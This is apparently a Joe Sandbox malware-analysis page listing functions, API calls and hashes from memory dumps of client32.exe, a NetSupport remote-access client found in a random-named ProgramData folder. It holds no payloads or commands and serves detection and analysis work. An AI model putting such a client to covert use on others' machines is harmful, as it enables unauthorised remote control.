Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750

Function 111447F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\o2xqxqs\client32.exe,00000104,?,11144A43,?), ref: 11144819

Strings

C:\ProgramData\o2xqxqs\client32.exe, xrefs: 11144804, 11144812
yi, xrefs: 1114482A, 1114484F, 1114485E, 11144871

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\ProgramData\o2xqxqs\client32.exe$yi
API String ID: 2251294070-1643492690
Opcode ID: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
Opcode Fuzzy Hash: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780

Function 006B1020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 006B1027
GetStartupInfoA.KERNEL32(?), ref: 006B107B
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 006B1096
ExitProcess.KERNEL32 ref: 006B10A3

Memory Dump Source

Source File: 00000004.00000002.3109426166.00000000006B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000004.00000002.3109395611.00000000006B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3109458678.00000000006B2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6b0000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: c81c886f3b7b56bb973b47292fc69ba8231bc41c5fd1a0c66a178aaed300f458
Instruction ID: e0ccac0265bff15427ce491f9aa1f6f6cf8888ef462904ec5fe3ce5af6a5a6ee
Opcode Fuzzy Hash: c81c886f3b7b56bb973b47292fc69ba8231bc41c5fd1a0c66a178aaed300f458
Instruction Fuzzy Hash: 7C11A5E04083C97AEB317F6488B87EABFA75F13380FA41044D9D59A346DA5648C7C765

Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
CloseHandle.KERNEL32(?), ref: 11030DC9
FreeLibrary.KERNEL32(?), ref: 11030DD4
CloseHandle.KERNEL32(00000000), ref: 11030DDB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$FreeLibraryObjectSingleWait
String ID:
API String ID: 1314093303-0
Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40

Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
__wsplitpath.LIBCMT ref: 11112185

Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46

GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
String ID:
API String ID: 1847508633-0
Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5

Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28

Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0058BDA0,0058BDA0,0058BDA0,0058BDA0,0058BDA0,0058BDA0,0058BDA0,111EFB64,?,00000001,00000001), ref: 1109EDB0
Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,0058BDA0,?,00000001,00000001), ref: 1109EDC3

CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: cb3383b0994d8397017392731cb1192891cda6e372d1495981830b61e84a3331
Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
Opcode Fuzzy Hash: cb3383b0994d8397017392731cb1192891cda6e372d1495981830b61e84a3331
Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50

Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 110271CD

Strings

?:\, xrefs: 110271C2

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91

Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED4E0: RegCloseKey.ADVAPI32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

Error %d Opening regkey %s, xrefs: 110ED54A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0

Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 11176045

Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9

__tzset_nolock.LIBCMT ref: 11176056

Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792

Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7

Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA

GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2

Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754

Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11164EBA

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585

Function 006B1000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,?,006B10A2,00000000), ref: 006B100B

Memory Dump Source

Source File: 00000004.00000002.3109426166.00000000006B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000004.00000002.3109395611.00000000006B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3109458678.00000000006B2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6b0000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction ID: e44bdaf86f3b0f644f744794bfef9ece62010464362799e9bcb5934ad1be7056
Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction Fuzzy Hash: 40B092B212434DAB8714EE98E851CBB339DAA98600B400809BD0547282CA61FCA0A675

Non-executed Functions

Function 110077A0 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16

LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
SetCursor.USER32(00000000), ref: 110077F1
GetDC.USER32(?), ref: 1100781D
CreateCompatibleDC.GDI32(00000000), ref: 1100782A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
SelectObject.GDI32(?,00000000), ref: 11007942
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
CreateCompatibleDC.GDI32(00000000), ref: 11007963
CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
SelectClipRgn.GDI32(?,00000000), ref: 110079A1

Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308

Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97

BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
